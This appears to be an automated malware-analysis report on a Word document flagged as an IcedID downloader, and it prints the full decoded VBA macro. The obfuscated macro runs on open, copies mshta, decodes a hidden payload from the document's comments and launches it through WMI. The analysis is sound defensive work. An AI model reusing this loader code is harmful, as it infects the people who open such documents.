MALICIOUS
170
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject(abtToa).create (aWjxv) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12996 bytes |
SHA-256: 5f5631aa2553e5b771b231a453e4f50fd9af112def85e8550fb2de7ce2c987c4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aEdyq"
Function ati159(aw2aL)
' Oil expand beginners pride clarke batting limbo eddie
' Fairfield vomiting react attempting mortgages havana
' Impel impromptu nebuchadnezzar element bulkhead
' Efficacious
' Html qt
' Ineffable analyze glenn
' Molding markers kde
' Babel omnibus
' Proved
' Nat several ho
' Ping having enigma
amklBH = aw2aL
aIFKnO = Len(amklBH)
For aTuWp = 0 To aIFKnO - 1
' Camcorders demoralization lovers
' Wool scripting breeds
' Invasion turquoise
' Larva
' Play liabilities suddenly acceleration
' Possessive forecastle toyota expired static statutory
' Palaver dash dazzle
' Fabric alumina dining deferred various
' Mourner beet dependent upland
' Profanation behest california welfare
' J gets
' Ahoy spot counterfeit southampton
ab3HB = ab3HB & Mid(amklBH, (aIFKnO - aTuWp), 1)
Next aTuWp
' Brine prisoner
ati159 = ab3HB
End Function
Public Function admq0V(aRsqgz)
admq0V = Replace(aRsqgz, aso8D, "")
' Dozens muslim hazardous specter unceasing
' Illusory italia positioning inspection distinguished
' Prohibit denizen llc
' Rail kurt bald
' Midi beaver trash
' Joiner subsidiary
' Bumper
' Desperado
' Organizations seasick tests
' Lesions shannon
' Melee gently
End Function
Sub AutoOpen()
' Engine hamilton
' Inspired heinous recondite
' Florida principality cowslip ups
' Floyd ulster aspen transmission
' Arcadian electron spam auditory pmid
' Federation
' Consonant wide
' Byte journalist
' Enclose nomadic give coolie
' Anniversary liberate
' Sustenance kerosene broken-down
aGis3U
End Sub
Attribute VB_Name = "aCiBE5"
Public Const aHVzE2 As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const aso8D As String = ")"
Public Const auQG07 As Integer = 2256 - 2243
Function apdSL6()
' Cherubs
End Function
Sub aG1tsp(azxyCG)
' Protected weight guild
' Polished andrea denunciation eyebrow environment disappointed
' Thomas indian licentiousness tinker impressive hard
' Frog dsl pulled anna schema
' Walt sensitive
' Stucco convoy unattainable benchmark
' Generic sp excited
' End soft away spike
' Dee libyan
' Adroit observatory
' Patterns puncture leash fifty-four reel
' Species saturn
' Leonard prospective
' Erotic
' Edification patricia cuff funding
' Penitence gis there southwark hat models
' Blues stockholm uni slanderous
' Connections lather malachi pad pulse navigation
' Element does hq criticized
' Jane dogged or dot
' Contains meaningless stinging james
' Possess sharp millennium hackneyed
' Ennui provocative
' Acceptation egg jm
' Redhead paste demolition qld snap
' Infirm trace
' Tonight macedonians beleaguered forsworn
' Word muffin decisions uk mas joke
' Feed screen
' Sponsors daily
' Original cuckold rhythm
' Demarcation picking hazardous pre- resumes core
' Tottering cleaner
' Cuirass oxford unauthorized pj
' Monopolize fingering
End Sub
Function adIae(ay3Te)
' Advertiser housewife lucknow influence todd
' Refine immoderate orpheus chronology
' Defraud actually mel friends
' Pegasus bracket mainstream structure michel plume awe-struck animates
' Logos communist accomplished
' Poll grip diminutive devon
' Sexcam issued households restrict monaco
' Unsaid acids
' Comparing mongolian elective muslim solutions
' Ant quarterly vendors pear
' Helicopter ewe masonry sameness
adIae = ActiveDocument.BuiltInDocumentProperties(ay3Te)
End Function
Public Sub aJGw3()
If 1600 / 25 < 150 Then
Call aYoDX
End If
End Sub
Public Sub a6B0P()
If 1600 / 25 < 150 Then
Call alQ8C
End If
End Sub
Attribute VB_Name = "aG9DJS"
Public Function amB0qZ(awnJX2, aDw0bE)
' Stabbing left provides
' Graphs
' Resulting saying js forest
' Orbit finals comments anyway
' Fallacious descry joins cannibalism
' Convinces networks freelance
' Destroyed bellow sirrah savannah
' Ooze interdict rectify hackers shapes
' Refrigerator
' Brainless locking angelina spelling
' Dispersing dogmatism
' Construe peaceful forums
' Venom handcuffs amaze
' Delayed
' Orgy cabinets pound wizard appropriately
' Fittest entity yeh telescope
' Suet man sedge universe
' Stuffy enrolled
' Hop col fiftieth relax
' Four jd entities porpoise logs
' Decisions tic flirtation
FileNumber = FreeFile
Open awnJX2 For Output As #FileNumber
' Peerage boring wayne trackbacks taxation
' Malawi
' Valuables fevered
' Tongue-tied israeli staccato
' Villa ringleader recurring belittle
' Spectrum demonstrated burden rick gave
' Reduced codes apocryphal sponsor treasurer
' Knightly corruption lack
' Healing departure gold nonsensical
' Bye shoal slow
Print #FileNumber, aDw0bE
Close #FileNumber
End Function
Sub aClJqU(anSvbk, adX9q)
' Discerning quail temperature
' Victorian catacombs square petition apollo
' Son comfort
' Obligations fir
FileCopy anSvbk, adX9q
End Sub
Function abH61(an1Ja)
abH61 = an1Ja
End Function
Attribute VB_Name = "aBM6Pm"
Sub aGis3U()
aJGw3
a6B0P
' Parenting mosque
' Surgeons wines installed
' Authorized expeditious gale approximate
' Alarm seville
' Recordings ostentatious safer marvin hydra
' Differently archaic abbreviated oecd required cocoa
' Unaccompanied graphics sleight
' Traditions pizza early noisome reasons runs commission
' Introduces provider microwave publishing ser
' Recede trigonometry
' Aggressor sr assault mined
' Yuan bandit inequalities
' Fervid Word unfettered
' Vim pore
' Keg bumper animated fag mountains
' Hist breaking
' Centurion thunderstruck evaporate inimitable heb. tiara guardian
' Estate throttle optimization payments
' Perfectly millions economize any
' Transform injuries clan hypothetical
' Junk
' Inflation projected senior baroness
' Umbrellas homepage ta incidentally
' Portent whilst sop jumps
' Visitor roads existing traveling gave
' Warwickshire ira chamois graduation
' Moderator loosen
' Timorous murder estimated
' Misgivings postmaster
' Unix muslims concentrations msie dignify
' Mildew edt sterling
' Prow insects
' Norma debatable reported discharging agree reading biography
abtToa = admq0V(ati159(aHVzE2))
CreateObject(abtToa).create (aWjxv)
End Sub
Attribute VB_Name = "aQlvJ"
Function aBt82()
aBt82 = VBA.Split(ati159("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function aoiuE(a5Ji6A)
aqd7n = aBt82()
' Mastiff itch fisher frontpage
' Attorneys
' Dump trample ebooks introduces steak
' Ranking continued omnipotent
' Seal bus
' Vocal tramadol
' Interracial ashley
' Variation narrate scion
' Contemn epidemics adduced
' Wrongdoing drover glasgow
' Memento information que such
' Himalayas annoying spell furlough perpetuate ungodly
' Macedon come welled ag determining
' Norm surplus portions
' Gaseous concomitant stunt
' Floral emulation
' Fraternal blacks pharmacies
' Termination belly
' Croatia attorneys greensboro
' Uw bbw insider coffer
' Sociology ukraine handmade
Select Case a5Ji6A
' Mason lisa won trusted ps
' Impious qualify
' Literally singing greenish raises demi eva mr
' Nullify tee largesse
' Fusillade apostate applicable
' Hosea
' Incubus lothario unprecedented density tributary capriciously
' Lengthy recurring statewide assumed
' Mystery telephony beyond
' Confidential ruse
' Pestilent screenshots mastiff non-
' Finishing determines bradford renew
Case 0:
' Governmental weeps thanks griffith
' Indirect trout flounder craven thu
' Alderman stuffy concomitant
' Gary clarke buttonhole
' Foolscap personnel threefold
' Lou documents
' Glossary dynamite
' Ones global fustian
' Flyer
' Lecture counsellor
' Ethnic russia limitations particularly tart undertake sustenance
aoiuE = aqd7n(1)
' Topic conjuncture find scored
' Insatiable prosy
' Advances tripadvisor moments complete
' Blasphemy excitement
' Beleaguered saved instantaneous historical thirty-one
' Compression chaplet syntax fact
' Diffs perth
' Relentless pyrites mai luster tv
' Wolfish peru sculpture addicted fear
' Got forth specialties paddy such
Case 1:
aoiuE = aqd7n(2)
' Bias effusive receiving rolls
' Athletics
' Mechanisms deemed
' Unveil da
' Stewart surmise
' Betrayal tenaciously
' Forge chequered hawser exemption
' Alleged ungracious loading om
' Ana urges grannie
' Holly dining discharging ranks
' Trinity
Case 2:
aoiuE = aqd7n(3)
End Select
End Function
Sub alQ8C()
aMUEc = a7PjYe(aoiuE(2))
amB0qZ aMUEc, anD3Wb(adIae("comments"))
End Sub
Attribute VB_Name = "akNhYX"
Function aMuJH(apa7E)
' Drawing trend macaroni
' Romanticism
' Oral beetles plug
' Chat enhancements depreciate
' Minerals impacts
' Boa crabs adjusted craps scowl
' Peripheral postcards
' Door freckled
' Coaching steam seraph
' Maya excel hopping ammonia emphasize
aMuJH = admq0V(apa7E)
End Function
Function awrPp(aFwCiR)
awrPp = (admq0V(aFwCiR))
End Function
Function a7PjYe(aQYNDG)
a7PjYe = (admq0V(aQYNDG))
End Function
Function aWjxv()
ag5tUp = awrPp(aoiuE(1))
alVXY = a7PjYe(aoiuE(2))
aWjxv = ag5tUp & " " & alVXY
End Function
Sub aYoDX()
ay3zi = aMuJH(aoiuE(0))
ag5tUp = awrPp(aoiuE(1))
aClJqU ay3zi, ag5tUp
End Sub
Function aYj8w(aF3xO)
aYj8w = aF3xO + -461 + 487
End Function
Function arCWmU(aSxHC)
If aSxHC = 0 Then
arCWmU = 15793 / 15793
' Favorites paraffin meal childbirth cultural
' Condescending gamble closure womanish montana dastardly
' Sometimes pied smith
' Taste yet con
ElseIf aSxHC = 5 Then
arCWmU = 239 - 142
Else
arCWmU = 1035 - 11
End If
End Function
Function ax87U(aF3xO, aHv3C)
ax87U = aF3xO - aHv3C
End Function
Function aniW5(aF3xO)
aniW5 = Chr(aF3xO)
' Endearment wildlife
' Unconcern
' Memories sark powerseller
' Mosquito indie
' Premise sepulture benefice meekness
' Dislocation
' Other
' Band jones
' Dauphin sonic suffered libyan
' Loading twenty-sixth pacify
' Flue weakling puberty turquoise
End Function
Attribute VB_Name = "afdrn"
Function anD3Wb(aQv5W) As String
Dim aHLfa As Long
Dim aqD6e As Integer
Dim a54Xg As Integer
For aHLfa = 1 To VBA.Len(aQv5W) Step 1
a54Xg = 0
' Itunes persons faultless
akxiQ = Mid(aQv5W, aHLfa, 1)
' Summit royalty
' Slit bed phantom affected
' Outlandish facade pillow stuffy inorganic
' Generic emulation tannin determine explicitly
' Uri behalf
' Interracial clicks quarterly
' Siberia
' Macromedia furthermore processor cursor authentication games
' Thesis rotary perspectives kids deutsche
' Consequence
aqD6e = Asc(akxiQ)
' Theme federal ungodly christians pincers perl
' Sacred dais qui revised barely chairs
' Momentum demesne agape
' Mercedes predatory repeal cookie illustration
' Aberdeen torpid
' Ring editions marion utc
' Surge
' Knee-deep flight husband management industries
' Preposition bytes pursuant
' Former circles variability
' Britney vita cooked
' Photographic pda article goblin specially
' Cam decoy cameo cellular banging carnal
' Bleed petroleum
' Heyday livestock
' Rose humans premonition census reasoning gather
' Augur crack rugs laboratories halifax
' Systematic nylon bleached parvenu horus surreptitiously
' Assignment any
' Smithy pawn childrens sammy goal ec
' Displays stifle platinum from casual rejoinder
' Tunisia
' Discovers choral share
' Infusion
' Malawi moraine vulture
' Refund mirror cowper
' Soliloquy holocaust fatherless
' Al dislodge icons
' Aspirant unravel psychiatry
' Passing
' Augury
' Hundreds escape adorer z homeless
' Linking
' Windsor i merchant petiole
' Phpbb mrs chary marcus
' Micah richard revolve
If (aqD6e > 64 And aqD6e < 91) Or (aqD6e > 96 And aqD6e < 123) Then
' Finale atop responsibilities depth
' Devon vietnam worry
' Olden communist
' Nausea thesaurus simpleton applied
' Counterbalance kerry
' Poet acquirement tether cab ao
' Fx municipality
' Alicia terrorist ep profusely anent own
' Supercilious
' Angelus
' Fixtures coldest abrogated emotions
a54Xg = auQG07
aqD6e = ax87U(aqD6e, a54Xg)
' Sap global
If aqD6e < arCWmU(5) And aqD6e > 83 Then
aqD6e = aYj8w(aqD6e)
ElseIf aqD6e < 63 + 2 Then
aqD6e = aYj8w(aqD6e)
End If
End If
azKFti = aniW5(aqD6e)
' Mostly external wales
' Mort exemption aqua
' Expense dropped bdsm token uterus discordant young
' Inconspicuous heat considering ap combatant
' Proudly jockey schema bhutan voyager
' Sparrow earth
' Theoretical seacoast trade manifesto slouch
' Rig burst dover
' Delicious
' Gst
' Hooked subvert mesh beam
Mid$(aQv5W, aHLfa, 1) = abH61(azKFti)
Next
anD3Wb = aQv5W
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 53760 bytes |
SHA-256: 9a58852f2a0443a7e4055ed1b35d4651daaa17aade044ef540895cdffee65845 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.